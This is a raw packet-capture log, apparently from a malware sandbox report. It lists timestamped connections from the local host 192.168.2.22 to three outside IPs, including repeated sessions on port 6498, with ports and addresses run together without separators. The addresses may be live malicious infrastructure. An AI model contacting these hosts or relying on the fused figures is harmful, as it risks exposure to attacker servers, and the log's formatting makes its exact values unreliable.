                                                                                                                                                                        Oct 23, 2024 17:27:20.336944103 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.336966038 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.337471962 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.337482929 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.337502003 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.337518930 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.337573051 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.337585926 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.337624073 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.377804995 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.377895117 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.377907991 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.377978086 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.432709932 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.432753086 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.432806015 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.432967901 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.432981014 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.432996035 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.433022022 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.433331013 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.433363914 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.433372974 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.433377981 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.433388948 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.433399916 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.433418036 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.438524961 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438536882 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438548088 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438560009 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438571930 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438581944 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.438591957 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438597918 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438599110 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438600063 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.438604116 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438606024 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438610077 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438626051 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.438638926 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.438678980 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.459417105 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459435940 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459450960 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459464073 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459475994 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459489107 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459501982 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459512949 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459518909 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459523916 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459531069 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459541082 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.459542990 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459559917 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.459702969 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.459702969 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.496953011 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.496978045 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.496993065 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.497006893 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.497030973 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.530680895 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.530699015 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.530715942 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.530738115 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.550415039 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.550491095 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.550553083 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.550570011 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.550607920 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.550700903 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.550714970 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.550719023 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.550749063 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.550971985 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.550985098 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.550996065 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.551019907 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.552999020 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.553011894 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.553030968 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.553050041 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.553145885 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.553152084 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.553196907 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.554461956 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.554567099 CEST804917385.215.206.82192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.554613113 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.605833054 CEST4917380192.168.2.2285.215.206.82
                                                                                                                                                                        Oct 23, 2024 17:27:20.663806915 CEST491746498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:20.669222116 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:20.669285059 CEST491746498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:20.676645041 CEST491746498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:20.682441950 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:21.576637030 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:21.729759932 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:21.729863882 CEST491746498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:21.733961105 CEST491746498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:21.739284039 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:21.740298986 CEST491746498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:21.746633053 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:22.021730900 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:22.023233891 CEST491746498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:22.028851986 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:22.174499989 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:22.177515030 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:22.182923079 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:22.182981968 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:22.186734915 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:22.192121983 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:22.380940914 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                        Oct 23, 2024 17:27:22.381036043 CEST491746498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:22.386450052 CEST8049176178.237.33.50192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:22.387331963 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                        Oct 23, 2024 17:27:22.412441969 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                        Oct 23, 2024 17:27:22.417975903 CEST8049176178.237.33.50192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.097352982 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.237325907 CEST8049176178.237.33.50192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.239084959 CEST4917680192.168.2.22178.237.33.50
                                                                                                                                                                        Oct 23, 2024 17:27:23.243182898 CEST491746498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.248519897 CEST64984917445.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.249929905 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.249979973 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.254133940 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.259427071 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.259485006 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.265002966 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.546442986 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.546459913 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.546473026 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.546497107 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.546509027 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.546519041 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.546520948 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.546550035 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.546556950 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.546636105 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.546650887 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.546684027 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.546772003 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.546785116 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.546824932 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.547568083 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.547580004 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.547621965 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.551948071 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.551987886 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.552000046 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.552054882 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.699534893 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.699548960 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.699565887 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.699615002 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.699636936 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.699649096 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.699673891 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.699717999 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.699757099 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.700100899 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.700150013 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.700160027 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.700186014 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.700481892 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.700520992 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.700555086 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.700563908 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.700598955 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.700659037 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.701056004 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.701083899 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.701091051 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.701982975 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.818425894 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.818454027 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.818465948 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.818497896 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.818532944 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.818546057 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.818558931 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.818578005 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.818816900 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.818852901 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.818869114 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.818883896 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.818914890 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.818944931 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.819377899 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.819415092 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.819427967 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.819442034 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.819478989 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.821134090 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.852672100 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.852688074 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.852756977 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.937357903 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.937407970 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.937455893 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.937467098 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.937482119 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.937550068 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.937602043 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.937684059 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.937696934 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.937707901 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.937722921 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.937750101 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.937907934 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.937961102 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.937972069 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.937998056 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:23.938079119 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.938091993 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:23.938117981 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.029297113 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.029309988 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.029366016 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.055874109 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.055895090 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.055906057 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.055923939 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.056040049 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.056052923 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.056066990 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.056091070 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.056353092 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.056426048 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.056438923 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.056503057 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.056615114 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.056627035 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.056653976 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.057081938 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.057125092 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.057192087 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.057205915 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.057241917 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.057305098 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.058602095 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.147413015 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.147456884 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.147516012 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.174738884 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.174772024 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.174782038 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.174823046 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.174863100 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.174876928 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.174890041 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.174911022 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.175192118 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175234079 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.175270081 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175354004 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175395012 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.175409079 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175424099 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175461054 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.175806046 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175818920 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175857067 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.175889969 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175901890 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175914049 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.175946951 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.177416086 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.266617060 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.266633987 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.266680956 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.293127060 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293143988 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293152094 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293174028 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293185949 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293193102 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.293220997 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.293505907 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293515921 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293548107 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.293661118 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293744087 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293756962 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293781042 CEST491756498192.168.2.2245.90.89.98
                                                                                                                                                                        Oct 23, 2024 17:27:24.293864012 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293876886 CEST64984917545.90.89.98192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:24.293888092 CEST64984917545.90.89.98192.168.2.22
